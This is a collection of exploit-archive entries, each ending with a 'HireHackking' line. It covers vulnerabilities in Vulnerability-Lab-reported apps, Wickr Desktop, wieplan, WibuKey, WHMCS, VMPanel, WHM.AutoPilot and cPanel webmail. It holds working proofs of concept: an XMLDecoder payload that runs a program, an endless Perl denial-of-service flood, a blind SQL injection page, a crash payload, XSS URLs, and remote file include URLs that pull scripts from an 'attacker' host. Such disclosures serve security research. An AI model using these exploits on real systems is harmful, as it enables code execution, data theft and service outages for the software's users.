`filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in 
the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` 
in connection with the vulnerable file upload POST method request. 

Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious 
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. 

The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. 
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation 
of the local file include web vulnerability results in mobile application compromise or connected device component compromise.

Request Method(s):
				[+] [POST]

Vulnerable Module(s):
				[+] File Upload

Vulnerable Parameter(s):
				[+] filename

Affected Module(s):
				[+] Index File Dir Listing (http://localhost:49276/)


Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers without privileged application user accounts or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: GET
http://localhost:49276//%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png


PoC: Vulnerable Source
<p><a href="..">..</a><br>
<a href="68-2.png">68-2.png</a>		(    24.3 Kb, 2015-03-09 14:57:29 +0000)<br>
<a href="/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"></%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a>	(     0.5 Kb, 2015-03-09 14:57:48 +0000)<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label>
<label><input type="submit" name="button" id="button" value="Submit" /></label></form></body></html></iframe></a></p>


--- PoC Session Logs [POST] (Inject)---
Status: 200[OK]
POST http://localhost:49276/ 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[846] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:49276]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:49276/]
      Connection[keep-alive]
   POST-Daten:
      POST_DATA[-----------------------------28140821932238
Content-Disposition: form-data; name="file"; filename="%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"
Content-Type: image/png


Reference(s):
http://localhost:49276/
http://localhost:49276//%3C./


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and 
disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
Encode the output in the file dir index list with the vulnerable name value to prevent an application-side injection attacks.


Security Risk:
==============
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.3)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking 
Wieland wieplan 4.1 Document Parsing Java Code Execution Using XMLDecoder


Vendor: Wieland Electric GmbH
Product web page: http://www.wieland-electric.com
Affected version: 4.1 (Build 9)

Summary: Your new software for the configuration
of Wieland terminal rails. wieplan enables you to
plan a complete terminal rail in a very simple way
and to then place an order with Wieland. The configured
terminal rail can be stored in DXF format and read
into a CAD tool for further processing. Due to the
intuitive user interface, the configuration of terminal
rails with wieplan is easy.

Desc: wieplan suffers from an arbitrary java code
execution when parsing WIE documents that uses XMLDecoder,
allowing system access to the affected machine. The
software is used to generate custom specification
order saved in .wie XML file that has to be sent
to the vendor offices to be processed.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)
           Java/1.8.0_73
           Java/1.6.0_62


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5304
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5304.php


25.11.2016

---


<?xml version="1.0" encoding="UTF-8"?>
<java version="1.6.0_02" class="java.beans.XMLDecoder">
 <object class="java.lang.Runtime" method="getRuntime">
    <void method="exec">
        <string>c:\\windows\\system32\\calc.exe</string>
    </void>
 </object>
</java>
HireHackking 
Document Title:
===============
Wickr Desktop v2.2.1 Windows - Denial of Service Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1377

Video: 
http://www.vulnerability-lab.com/get_content.php?id=1388

 
Release Date:
=============
2014-12-25


Vulnerability Laboratory ID (VL-ID):
====================================
1377


Common Vulnerability Scoring System:
====================================
3.3


Product & Service Introduction:
===============================
Wickr (pronounced `wicker`) is a proprietary instant messenger for iPhone and Android. Wickr allows users to exchange end-to-end encrypted and 
self-destructing messages, including photos and file attachments. The `self-destruct` part of the software is designed to use a `Secure File Shredder` 
which the company says `forensically erases unwanted files you deleted from your device`. However the company uses a proprietary algorithm to manage 
the data, a practice which is prone to error according to many security experts.

On January 15, 2014, Wickr announced it is offering a US$100,000 bug bounty for those who find vulnerabilities that significantly impact users. In addition, 
a recipient can in general use other software and techniques like screen-capture capabilities or a separate camera to make permanent copies of the content.

(Copy of the Homepage: https://wickr.com/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a denial of service web vulnerability in the offical Wickr Desktop v2.2.1 windows software.


Vulnerability Disclosure Timeline:
==================================
2014-12-25:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Wickr Inc.
Product: Wickr - Desktop Software (Windows) 2.2.1


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Technical Details & Description:
================================
A local denial of service vulnerability has been discovered in the official Wickr TSM v2.2.1 (MSI) windows software.
The issue allows local attackers to crash or shutdown the software client by usage of special crafted symbole payloads.

The wickr v2.2.1 (msi) software crashs with unhandled exception in the CFLite.dll by the qsqlcipher_wickr.dll when processing to include 
special crafted symbole strings 
as password or name. The issue occurs after the input of the payload to the `change name friend contacts`-, `the wickr password auth`- 
and the `friends > add friends` input fields. Attackers are able to change the name value of the own profile (payload) to crash the 
wickr client. Local attackers can include the payload to the input fields to crash/shutdown the application with unhandled exception.

The security risk of the denial of service vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. 
Exploitation of the DoS vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of 
the vulnerability results in an application crash or service shutdown.


Vulnerable Module(s):
				[+] friend contacts
				[+] wickr password auth
				[+] friends

Vulnerbale Input(s):
				[+] add friends (name)
				[+] wickr password auth
				[+] change friend (update name)

Vulnerable Parameter(s):
				[+] name (value input)
				[+] password (vale input)


Proof of Concept (PoC):
=======================
The denial of service web vulnerability can be exploited by remote attackers and local attackers with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Download Wickr v2.2.1 for windows to your windows 8 box (mywickr.info/download.php?p=4) 
2. Install the wickr windows version of the software to your windows 8 box
3. Create an new account and include the payload to the password input field
Note: After the payload has been processed to the auth, the software crashs. You should attach a debugger ago.
4. Successful reproduce of the first issue!
5. We register a new account with regular values
6. Open the friends > add friends section and include the payload to the search input value
Note: After the payload has been processed to add the friend, the software crashs. You should attach a debugger ago.
7. Successful reproduce of the second issue!
8. We open the software again and login. Switch to the existing friends contacts and edit the profile
9. Include in the name values the payload and save the settings
Note: After the payload has been processed to change to the name, the software crashs. You should attach a debugger ago.
4. Successful reproduce of the third issue!


Payload: Denial of Service
็¬็ส็็็็็ -็็็็็็็็็็็็็็็็็็็็ส็¬็็็็็็็็¬็็็็็็็็็็็็็็็็ส็็็็¬็็็็็็็็็-็็็็็็็ ็็็็็ส็็็็็็็¬็็็็็็็็็็¬็็็็็็็็ส็็็็็็็็็็¬็็็็็็็็็็็ ¬็็็็ส็็็็็็็็็็็็็¬็็็็ ็็็็็็็็¬ส็็็็็็็็็็็็็็็็-็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็ ¬็็็็็็ส็็็็็็็¬ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็¬¬็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็¬็ 


--- Error Report Logs ---
EventType=APPCRASH
EventTime=130628671359850105
ReportType=2
Consent=1
UploadTime=130628671360390638
ReportIdentifier=df89d941-8208-11e4-be8b-54bef733d5e7
IntegratorReportIdentifier=df89d940-8208-11e4-be8b-54bef733d5e7
WOW64=1
NsAppName=Wickr.exe
Response.BucketId=96ac0935c87e28d0d5f61ef072fd75b8
Response.BucketTable=1
Response.LegacyBucketId=73726044048
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=Wickr.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=0.0.0.0
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=02849d78
Sig[3].Name=Fehlermodulname
Sig[3].Value=CFLite.dll
Sig[4].Name=Fehlermodulversion
Sig[4].Value=0.0.0.0
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=53f6c178
Sig[6].Name=Ausnahmecode
Sig[6].Value=c0000005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=00027966
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.3.9600.2.0.0.256.48
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusatzinformation 1
DynamicSig[22].Value=5861
DynamicSig[23].Name=Zusatzinformation 2
DynamicSig[23].Value=5861822e1919d7c014bbb064c64908b2
DynamicSig[24].Name=Zusatzinformation 3
DynamicSig[24].Value=84a0
DynamicSig[25].Name=Zusatzinformation 4
DynamicSig[25].Value=84a09ea102a12ee665c500221db8c9d6
UI[2]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
UI[3]=Wickr.exe funktioniert nicht mehr
UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
UI[5]=Online nach einer Lösung suchen und das Programm schließen
UI[6]=Später online nach einer Lösung suchen und das Programm schließen
UI[7]=Programm schließen
... ...  ... ...
LoadedModule[103]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\sqldrivers\qsqlcipher_wickr.dll
State[0].Key=Transport.DoneStage1
State[0].Value=1
FriendlyEventName=Nicht mehr funktionsfähig
ConsentKey=APPCRASH
AppName=Wickr.exe
AppPath=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
NsPartner=windows
NsGroup=windows8
ApplicationIdentity=6A5425CE651532265F599A5A86C6C2EE



Security Risk:
==============
The security risk of the denial of service web vulnerability in the wickr windows client software is estimated as medium. (CVSS 3.3)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]


-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking 
# Exploit Title: WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 13-06-2021
# Vendor Homepage: https://www.wibu.com
# Software Links: https://www.wibu.com/us/support/user/downloads-user-software/file/download/5792.html
# Tested Version: 6.51
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
WIBU-KEY Server
        WkSvW32.exe                               C:\PROGRAM FILES
(X86)\WIBUKEY\SERVER\WkSvW32.exe
                                   Auto

C:\Users\IEUser>sc qc WkSvW32.exe
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WkSvW32.exe
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\PROGRAM FILES
(X86)\WIBUKEY\SERVER\WkSvW32.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WIBU-KEY Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
HireHackking 
source: https://www.securityfocus.com/bid/57145/info

WHMCS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.

Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.

WHMCS 5.0 and 5.1 are vulnerable; other versions may also be affected. 

http://www.example.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}
HireHackking 
=====================================================
[#] Exploit Title :  VMPanel 2.7.4 - SQL Injection Web Vulnerability
[#] Author : Esmaeil Rahimian
[#] Date Discovered : 2016-12-07
[#] Affected Product(s): VMPanel v2.7.4 - Content Management System
[#] Exploitation Technique: Remote
[#] Severity Level: Medium
[#] Tested OS : Windows 10
=====================================================


[#] Product & Service Introduction:
===================================
VMPanel is a powerful web based VMware Esx/Esxi Control Panel + WHMCS addon
with VMPanel you can create or remove virtual machines remotely without the need to access vsphere Client aslo you can
Power Off,Power On, reset,virtual machine through the panel and module for WHMCS

(Copy of the Vendor Homepage: http://www.cybervm.com/ )


[#] Technical Details & Description:
====================================
A remote sql injection web vulnerability has been discovered in the official VMPanel v2.7.4 web-application (cms).
The web vulnerability allows remote attackers to execute own malicious sql commands to compromise the web-application or dbms.

The sql-injection web vulnerability is located in the `IP Address` entry name, that is located in the pannel administration. 
Remote attackers are able to run clean sql commands, the vulnerability attack vector is application-side and 
the injection request method is POST.

Request Method(s):
              [+] POST

Vulnerable Module(s):
              [+] (Input)

Vulnerable Parameter(s):
              [+] IP Address


[#] Proof of Concept (PoC):
===========================
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


--- PoC Session Logs [POST]---
Status: 200 [OK]
Host: localhost:2023
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:2023/sesswuzs6ugfaxa7ufii/index.php?act=addserver
Cookie: head_ippool=2; head_storage=2; head_servers=2; ssupp.vid=UMvYqzxZJxPU8VfwJ23WTpt5PWxnqZmYHQ45341807122016; ssupp.geoloc=%7B%22ipAddress%22%3A%22176.156.184.208%22%2C%22countryCode%22%3A%22FR%22%2C%22country%22%3A%22France%22%2C%22region%22%3Anull%2C%22city%22%3Anull%7D; WHMCS4tXQk3bQ4YHY=l8580de1p2dm64gtevt7jj15s7; SIMCookies001_sid=yd0da41j3abie5zhb8jwjsd5nk6c07ce
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 141


POST Method: server_name=&ip=[INJECTION SQL HERE]&pass=&mikip=&mikuser=&mikpass=&bw=&addserver=Add+Server


--- PoC Error Logs ---
SELECT * FROM `servers` WHERE `server_ip` = ''"/>>:22'
MySQL Error No : 1064
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"/>>:22'' at line 1


[#] Disclaimer:
===============
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.


Domain:     www.zwx.fr
Contact:    msk4@live.fr  
Social:     twitter.com/XSSed.fr
Feeds:      www.zwx.fr/feed/
Advisory:   www.vulnerability-lab.com/show.php?user=ZwX
            packetstormsecurity.com/files/author/12026/
            cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/
            0day.today/author/27461


                             Copyright (c) 2016 | ZwX - Security Researcher (Software & web application)
HireHackking 
/*
source: https://www.securityfocus.com/bid/65470/info

WHMCS is prone to a denial-of-service vulnerability.

Successful exploits may allow attackers to cause denial-of-service condition, denying service to legitimate users.

WHMCS 5.12 is vulnerable; other versions may also be affected. 
*/

#!/usr/bin/perl
#################################
#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#
#####################################
#####################################
#         Iranian Exploit DataBase
# WHMCS Denial of Service Vulnerability
# Test on Whmcs 5.12
# Vendor site : www.whmcs.com
# Code Written By Amir - iedb.team () gmail com - o0_shabgard_0o () yahoo com
# Site : Www.IeDb.Ir/acc   -   Www.IrIsT.Ir
# Fb Page : https://www.facebook.com/iedb.ir
# Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR  - F () riD - N20 - Bl4ck N3T - 0x0ptim0us - 0Day
# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - Mr.Zer0 - one alone hacker
# DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam Vanda - C0dex - Dj.TiniVini
# Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc
#####################################
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$data = "ajax=1&a=domainoptions&sld=saddddd&tld=saasssssssssss&checktype=owndomain";
$len = length $data;
$foo = "POST ".$dir."cart.php HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "################################################# \n";
print "##       WHMCS Denial of Service Vulnerability\n";
print "## Discoverd By Amir - iedb.team () gmail com - Id : o0_shabgard_0o \n";
print "##      Www.IeDb.Ir/acc   -   Www.IrIsT.Ir \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## http://host.com /whmcs/\n";
print "################################################# \n";
exit();
};
#####################################
#  Archive Exploit = http://www.iedb.ir/exploits-1300.html
#####################################
HireHackking 
source: https://www.securityfocus.com/bid/53740/info

WHMCS is prone to a cross-site scripting vulnerability and multiple HTML-parameter-pollution vulnerabilities because it fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the page is rendered to the user, and override existing hard-coded HTTP parameters which compromises the application.

WHMCS 5.0 is vulnerable; other versions may also be affected.

http://www.example.com/cart.php?a=add&domain=transfer&n913620=v992636

http://www.example.com/domainchecker.php?search=bulkregister&n946774=v992350

http://www.example.com/cart.php?currency=2&gid=1&n972751=v976696
HireHackking 
source: https://www.securityfocus.com/bid/53740/info
 
WHMCS is prone to a cross-site scripting vulnerability and multiple HTML-parameter-pollution vulnerabilities because it fails to properly sanitize user-supplied input.
 
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the page is rendered to the user, and override existing hard-coded HTTP parameters which compromises the application.
 
WHMCS 5.0 is vulnerable; other versions may also be affected.

http://www.example.com/knowledgebase.php?action = [XSS]
HireHackking 
source: https://www.securityfocus.com/bid/56173/info

WHMCS (WHM Complete Solution) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

WHMCS 4.5.2 is vulnerable; other versions may also be affected. 

#Proof of Concept : 

<html>
<head>
<title>WHMCS Blind SQL Injection POC</title>
</head>
<body>
<script>
var params = "<charge-amount-notification><google-order-number>0' %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>";
    var http = new XMLHttpRequest();
 try {
        netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
    } catch (e) {
        alert("Permission UniversalBrowserRead denied.");
    }
    http.open("POST", "http://site.com/whmcs/modules/gateways/callback/googlecheckout.php", true);
    http.onreadystatechange = handleResponse;
    http.send(params);
function handleResponse() {

  if(http.readyState == 4 && http.status == 200){
    var response = http.responseText;
alert(response);
    }
  }  
</script>
</body>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/53711/info

WHMCS (WHM Complete Solution) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

########################################
# First found around September 2011~
# Kept 0day because killing bugs is cruise control for gay.
# Author: dx7r
# fuck off.
# if you use this now, you're a moron. lots of love.
#######################################
import urllib2
import urllib
import os

def regglobcheck():
        regglob1 = urllib2.Request('http://127.0.0.1/whmcs/whmcs_v451/whmcs/modules/gateways/boleto/boleto_bb.php?dadosboleto[identificacao]=test')
        regglob2 = urllib2.urlopen(regglob1)
        regglob3 = regglob2.read().count('test')
        if regglob3 == 0:
                rgen = 0
                print " [+] Register Globals not enabled, no sqli on this whmcs install"
        elif regglob3 >= 1:
                rgen = 1
                print " [+] Register Globals enabled, own it."

regglobcheck()
HireHackking 
WHM.AutoPilot Multiple Vulnerabilities

Vendor: Benchmark Designs, LLC
Product: WHM.AutoPilot
Version: <= 2.4.6.5
Website: http://www.whmautopilot.com/

BID: 12119 
CVE: CVE-2004-1420 CVE-2004-1421 CVE-2004-1422 
OSVDB: 12693 12694 12695 12696 12697 
SECUNIA: 13673 
PACKETSTORM: 35559 

Description:
Started by a webhost looking for more out of a simple managment script, Brandee Diggs (Owner of Spinn A Web Cafe, Founder of Benchmark Designs) setout to build an internal management system that could handle the day to day operations of a normal hosting company. The key was to remove the need to constantly watch your orders and manage the installs. Alas, WHM AutoPilot was born. [ as quoted from their official website ] 


Cross Site Scripting:
There are a significant number of cross site scripting issues in WHM AutoPilot. Most of these are caused by calling scripts directly and specifying certain variable values yourself. Below are a few examples, though there are many more XSS holes than just the examples I am showing below. 

http://path/inc/header.php?site_title=%3C/title%3E%3Ciframe%3E
http://path/admin/themes/blue/header.php?http_images='%3E%3Ciframe%3E 

I believe that every file in the /themes/blue/ directory can be manipulated in this way, and of course this can be used to steal a users credentials or render hostile code. 


File Include Vulnerability:
WHM AutoPilot is susceptible to several potentially very dangerous file include vulns. Below are several examples of how files can be included and possibly executed remotely. 

http://path/inc/header.php/step_one.php?server_inc=http://attacker/step_one_tables.php
http://path/inc/step_one_tables.php?server_inc=http://attacker/js_functions.php
http://path/inc/step_two_tables.php?server_inc=http://attacker/js_functions.php 

This can be used to include php scripts and possibly take control of the webserver and more. A user does not have to be logged in to exploit this vulnerability either so that just makes it even more dangerous. Now for something weird: See the first example I gave above? Notice the "header.php/step_one.php"? Well, that was done to get around a piece of code that looked something like this. I am not going to include the actual code since this is proprietary software, but this should definitely give you the idea of what happened. 
if (ereg("test.php", $PHP_SELF)==true)
{
    include $server_inc."/step_one_tables.php";
}

This works because $PHP_SELF will return the value of "header.php/step_ one.php" expectedly. The below excerpt was taken from the php manual. 

"PHP_SELF
The filename of the currently executing script, relative to the document root. For instance, $_SERVER['PHP_SELF'] in a script at the address http://example.com/test.php/foo.bar would be /test.php/foo.bar. The __FILE__ constant contains the full path and filename of the current (i.e. included) file." 

I see a lot of developers use this variable without giving much though to how it can be taken advantage of. I have even found it can cause be used to conduct cross site scripting attacks when the phpinfo() function is called. 


Information Disclosure:
By default WHM AutoPilot is shipped with a phpinfo() script that is accessible to anyone. As far as I know WHM AutoPilot needs register globals to work, but if you want to check php settings anyway the file can be found in the root directory as "phpinfo.php" 


Solution:
I have contacted the developers, and a new version of WHM Autopilot is available. 


Credits:
James Bercegay of the GulfTech Security Research Team
HireHackking 
source: https://www.securityfocus.com/bid/57061/info

WHM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/webmail/x3/mail/filters/editfilter.html?account=&filtername=%22%3E%3Cimg%20src=x%20onerror=prompt(0);%3E

http://www.example.com/webmail/x3/mail/filters/editfilter.html?account=&filtername=%22%3E%3Cimg%20src=x%20onerror=prompt(0);%3E